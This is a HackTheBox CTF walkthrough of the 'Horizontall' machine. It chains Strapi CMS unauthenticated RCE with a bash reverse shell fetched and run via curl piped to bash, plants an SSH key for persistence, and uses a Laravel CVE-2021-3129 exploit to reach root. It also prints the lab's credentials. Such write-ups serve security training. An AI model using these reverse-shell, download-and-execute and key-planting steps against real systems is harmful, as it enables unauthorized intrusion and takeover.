Horizontall HackTheBox WalkThrough

This is Horizontall HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted Horizontall HackTheBox machine. Before starting let us know something about this box. It is a Linux OS box with IP address 10.10.11.105 and difficulty level easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and confirm your connectivity with Horizontall machine by pinging its IP 10.10.11.105. If all goes correct then it’s time to start hacking.

As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. I have used $ nmap (a popular Port Scanner) for this task and the result is given below: –

Scanning

$ sudo nmap -sC -sV -p- -oN full-port.nmap 10.10.11.105

Full port scan with nmap revealed port 22 and 80 as open. OpenSSH 7.6p1 is running on port 22 and nginx 1.14.0 web server is running on port 80. Googled for vulnerabilities in OpenSSH and Nginx but no any useful vulnerability found. Also, nmap script http-title revealed a virtual host horizontall.htb. So, before going further for any enumeration let us add horizontall.htb to our hosts file, hosts file is located in the directory /etc/.

Hosts File After Modification 1

$ cat /etc/hosts

On visiting the URL http://horizontall.htb/ got simple UI saying Build website using HT. After checking the source-code and other stuffs on the website, could not find any useful information.  

So moved forward for Directory and Virtual Host bruteforcing. Directory bruteforcing with $ dirsearch and wordlist directory-list-2.3-medium.txt couldn’t find any useful file and folder. But, Virtual Host bruteforcing with $ ffuf and wordlist subdomains-top1million-110000.txt found a virtual host api-prod.horizontall.htb.

$ ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://horizontall.htb -H "Host: FUZZ.horizontall.htb" -mc 200 -c

Let us add api-prod.horizontall.htb to our hosts file.

Hosts File After Modification 2

$ cat /etc/hosts

Ongoing to the URL http://api-prod.horizontall.htb/ found a simple page containing Welcome.

Then directory brute forced on this subdomain using $ dirsearch and wordlist directory-list-2.3-medium.txt.

$ sudo dirsearch -u http://api-prod.horizontall.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e all -x 404,403,301,303 -t 100

Directory bruteforcing revealed admin & reviews pages. Ongoing to http://api-prod.horizontall.htb/admin/ found the login page of strapi CMS.

Then I googled for the version of strapi CMS, vulnerabilities associated with them and how to find the version of strapi CMS being used.  Luckily, got this link which shows how to find the version of strapi CMS. Following this link http://api-prod.horizontall.htb/admin/strapiVersion I found that the installed version of strapi is 3.0.0-beta.17.4

Then a quick googling on the vulnerabilities of strapi CMS revealed that version 3.0.0-beta.17.4 is vulnerable to Unauthenticated Remote Code Execution and its public exploit is also present. Check this link on exploit-db.

Tip: It is always a good idea to check the vulnerabilities associated with them whenever you get any software or framework version during enumeration phase in any CTF.

Confirming RCE

To confirm Remote Code Execution on Horizontall machine follow the steps below.

$ wget https://www.exploit-db.com/download/50239 -O exploit.py

$ python3 exploit.py http://api-prod.horizontall.htb

$> whoami

After successful exploitation we get an Authenticated JSON web token and credential admin : SuperStrongPassword1.

We can use this credential to login at URL http://api-prod.horizontall.htb/admin/. Since it is a Blind RCE that’s why we can’t see any output on screen. We can confirm it from above screenshot.

Checking Connectivity with Kali Machine

To confirm whether we can get a reverse shell on our Kali machine, we need to check the connectivity of horizontall machine with our Kali machine. For checking the connectivity, I pinged my Kali box from horizontall machine and it was pinging.

$> ping -c 3 10.10.16.7

$ sudo tcpdump -i tun0 icmp

Now its time to get reverse shell using some one liner. You can get a list of one liner from this link.

Getting User Shell

To get reverse shell follow the given steps :

On Kali Machine

In window 1

$ echo '#!/usr/bin/bash'>shell.sh

$ echo 'bash -i >& /dev/tcp/10.10.16.7/9001 0>&1'>>shell.sh # Don’t forget to replace the IP with your Kali machine IP

$ cat shell.sh

$ sudo python3 -m http.server 80

In window 2

$ nc -nvlp 9001

$ whoami && id

On Horizontall Machine

$> curl http://10.10.16.7/shell.sh | bash

We have successfully got user shell. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

$ CTRL + Z # to background the shell

$ stty raw -echo

$ fg # then 2 times enter to foreground the shell

$ export TERM=xterm-256color

$ stty -a | head -n1

$ stty rows 43 columns 174

Capture User Flag

$ cat /home/developer/user.txt

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I go for manual enumeration.

Finding PrivEsc Vector

$ ss -lnpt command revealed that ports 3306, 1337 and 8000 are listening locally. There must be some services running over them.

MySQL server is running over port 3306. I tried to login into the server using the credential developer : #J!:F9Zt2uI. I got this credential from the file database.json which is present in the directory /opt/strapi/myapi/config/environments/development/. But there was no any useful information present in the databases.

When I tried to access port 1337 it didn’t respond. After accessing the service on port 8000 through the URL http://127.0.0.1:8000 found that the application running over this service is made of Laravel v8.

$ curl http://127.0.0.1:8000 | grep -A3 -B4 -i "Laravel v8"

Soon I got information about the Laravel immediately, I searched for the vulnerability and its exploit. After some research found that Laravel (<=v8.4.2) is vulnerable to Remote Code Execution when debug mode is enabled. For more info about this vulnerability check the CVE CVE-2021-3129. After checking the exploit at this URL found that it downloads phpgcc library from the GitHub while it executes on vulnerable machine. Since HackTheBox doesn’t have access to external Internet, so we can’t execute this exploit on horizontall machine.  For this we have to Local Port Forward port 8000 to our Kali machine, only then we can execute the exploit. Check last 5^th line of code in below screenshot.

We will use SSH for Local Port Forwarding. But we don’t have any SSH credential yet so we need to create one.

Since we have access to strapi user we can introduce our SSH public key from our id_rsa.pub file into the authorized_keys file of user strapi and then we can connect to horizontall machine using our SSH private key viz. id_rsa. So let us create a pair of RSA key using the command $ ssh-keygen.

On Kali Machine

$ ssh-keygen

$ cat ~/.ssh/id_rsa.pub

On Horizontall Machine

$ pwd

$ mkdir .ssh

$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDqvcT8ZYbpNsiqZ53qceUd1JbnaugzrTrdFJm1Jpfn0YBdcFxMM4SLuLEANZ5kUJWS147CAgAbe2ufJT7HOPi09jjB9d21DcfcsiZA7NJ9rJU0g1PWXwUm1WyZIgoRGh3cOw+JnnampekaowAJyIDWZnBjSUjoybBGL8EfjdDXXTxoim/b8RP6vpjwJYrTJiuWFNDyHeIej4WCklr3TwuiAy7KZ67mn8ICRpNpdbndPwWajJbHKe2Ua3KX/gnk5wJOF1tCxtdZQ4qFPwvg4I5ZirIQDsfJ/JoperybYknHMiAGoL2GagXzwBuj6jgoFRDzkRQ9sT5lYZ5GObAijWEuThL+VclpRGb+LreCy13fLCb3upRT7tZFx7KPB0oSgpWU/RLvffoeKweKoLdSD8eIjbI/mOdbnNJVqAz/8HrbvtfcIfmDFCB8XcS7YhpItZFq6wPLhNr+xJuutTbVZcAXCHP4aVEtKAX2Q29tmNBcAgfDa2cdcKQXFFlbWikufLE= deepak@kali">/opt/strapi/.ssh/authorized_keys

$ cat /opt/strapi/.ssh/authorized_keys

We have successfully transferred our public key to authorized_keys of user strapi on horizontall.

Local Port Forwarding

Let us login into the strapi SSH account using our id_rsa key and Local Port Forward port 8000 to our kali machine.

$ chmod 400 ~/.ssh/id_rsa

$ ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 [email protected]

 We can check the forwarded port using the command $ ss -lnpt

Now we can access the service which is running over port 8000 on horizontall machine to port 8000 on our Kali machine using the URL http://localhost:8000/.

When I tried to escalate the privilege using this exploit I could easily perform privilege escalation. So here out potential PrivEsc vector is Privilege Escalation by exploiting Vulnerable Software Version.

Getting Root by Privilege Escalation

To perform Privilege Escalation, follow the steps given at this URL or follow below steps.

$ git clone https://github.com/nth347/CVE-2021-3129_exploit.git

$ cd CVE-2021-3129_exploit

$ chmod +x exploit.py

$ ./exploit.py http://localhost:8000 Monolog/RCE1 id

We can clearly see that we have successfully escalated the privilege to root as the output of $ id command is

uid=0(root) gid=0(root) groups=0(root).

Capture Root Flag

Let us capture root flag.

$ ./exploit.py http://localhost:8000 Monolog/RCE1 'cat /root/root.txt'

This was how I rooted Horizontall HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the walkthrough feel free to write us at [email protected]